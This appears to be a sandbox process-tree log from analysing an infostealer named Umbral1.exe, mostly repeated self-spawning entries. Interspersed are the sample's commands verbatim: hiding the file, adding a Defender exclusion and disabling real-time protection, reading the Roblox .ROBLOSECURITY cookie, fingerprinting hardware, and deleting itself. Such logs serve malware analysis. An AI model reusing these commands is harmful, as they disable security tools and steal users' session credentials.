        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        441⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        440⤵
        
        PID:2856
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        439⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        438⤵
        
        PID:1216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        437⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        436⤵
        
        PID:3280
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        435⤵
        
        PID:5032
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        434⤵
        
        PID:4600
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        433⤵
        
        PID:4076
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        432⤵
        
        PID:3296
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        431⤵
        
        PID:3276
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        430⤵
        
        PID:2680
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        429⤵
        
        PID:3496
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        428⤵
        
        PID:3120
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        427⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        426⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        425⤵
        
        PID:2624
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        424⤵
        
        PID:4404
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        423⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        422⤵
        
        PID:3940
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        421⤵
        
        PID:2396
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        420⤵
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        419⤵
        
        PID:1620
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        418⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        417⤵
        
        PID:1180
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        416⤵
        
        PID:1332
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        415⤵
        
        PID:5060
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        414⤵
        
        PID:3704
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        413⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        412⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        411⤵
        
        PID:4612
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        410⤵
        
        PID:4384
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        409⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        408⤵
        
        PID:4416
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        407⤵
        
        PID:1316
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        406⤵
        
        PID:2376
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        405⤵
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        404⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        403⤵
        
        PID:4852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        402⤵
        
        PID:3940
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        401⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        400⤵
        
        PID:3608
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        399⤵
        
        PID:1696
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        398⤵
        
        PID:2736
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        399⤵
        Views/modifies file attributes
        
        PID:4352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral1.exe'
        399⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        399⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        399⤵
        
        PID:3228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        399⤵
        
        PID:2992
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        399⤵
        
        PID:2648
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        399⤵
        
        PID:3188
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        399⤵
        
        PID:3608
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        400⤵
        
        PID:2892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        399⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5048
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        399⤵
        Detects videocard installed
        
        PID:4628
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe" && pause
        399⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2944
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        400⤵
        
        PID:2708
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        400⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4160
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        397⤵
        
        PID:428
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        396⤵
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        395⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        394⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        393⤵
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        392⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        391⤵
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        390⤵
        
        PID:4400
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        389⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        388⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        387⤵
        
        PID:4492
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        386⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        385⤵
        
        PID:2868
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        384⤵
        
        PID:3124
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        383⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        382⤵
        
        PID:1180
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        381⤵
        
        PID:3940
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        380⤵
        
        PID:3308
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        379⤵
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        378⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        377⤵
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        376⤵
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        375⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        374⤵
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        373⤵
        
        PID:3708
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        372⤵
        
        PID:444
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        371⤵
        
        PID:1000
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        370⤵
        
        PID:4656
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        369⤵
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        368⤵
        
        PID:1484
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        367⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        366⤵
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        365⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        364⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        363⤵
        
        PID:2960
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        362⤵
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        361⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        360⤵
        
        PID:1404
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        359⤵
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        358⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        357⤵
        
        PID:4532
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        356⤵
        
        PID:4268
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        355⤵
        
        PID:720
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        354⤵
        
        PID:4100
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        353⤵
        
        PID:1452
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        352⤵
        
        PID:3036
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        351⤵
        
        PID:3852
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        352⤵
        Views/modifies file attributes
        
        PID:4952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral1.exe'
        352⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3280
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        352⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4536
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        353⤵
        
        PID:4256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        352⤵
        
        PID:1984
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        352⤵
        
        PID:3152
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        352⤵
        
        PID:1540
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        352⤵
        
        PID:3976
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        352⤵
        
        PID:4100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        352⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4628
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        352⤵
        Detects videocard installed
        
        PID:1000
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe" && pause
        352⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4420
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        353⤵
        
        PID:972
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        353⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4680
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        350⤵
        
        PID:4012
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        349⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        348⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        347⤵
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        346⤵
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        345⤵
        
        PID:1800
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        344⤵
        
        PID:5052
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        343⤵
        
        PID:4220
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        342⤵
        
        PID:3192
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        341⤵
        
        PID:4012
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        340⤵
        
        PID:3856
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        339⤵
        
        PID:2888
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        338⤵
        
        PID:3208
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        337⤵
        
        PID:1296
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        336⤵
        
        PID:2992
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        335⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        334⤵
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        333⤵
        
        PID:1388
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        332⤵
        
        PID:2384
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        331⤵
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        330⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        329⤵
        
        PID:4972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        328⤵
        
        PID:2340
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        327⤵
        
        PID:1808
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        326⤵
        
        PID:4904
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        325⤵
        
        PID:2104
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        324⤵
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        323⤵
        
        PID:4336
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        322⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        321⤵
        
        PID:2280
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        320⤵
        
        PID:4432
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        319⤵
        
        PID:972
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        318⤵
        
        PID:868
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        317⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        316⤵
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        315⤵
        
        PID:2084
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        314⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        313⤵
        
        PID:4952
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        312⤵
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        311⤵
        
        PID:960
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        310⤵
        
        PID:3088
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        309⤵
        
        PID:4352
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        308⤵
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        307⤵
        
        PID:3152
        
        C:\Users\Admin\AppData\Local\Temp\Umbral1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        306⤵
        
        PID:2436
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral1.exe"
        307⤵
        Views/modifies file attributes
        
        PID:712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral1.exe'
        307⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        307⤵
        
        PID:4404
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        307⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        307⤵
        
        PID:3564
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        307⤵
        
        PID:4368
        
        C:\Windows\System32\Wbem\wmic.exe
        
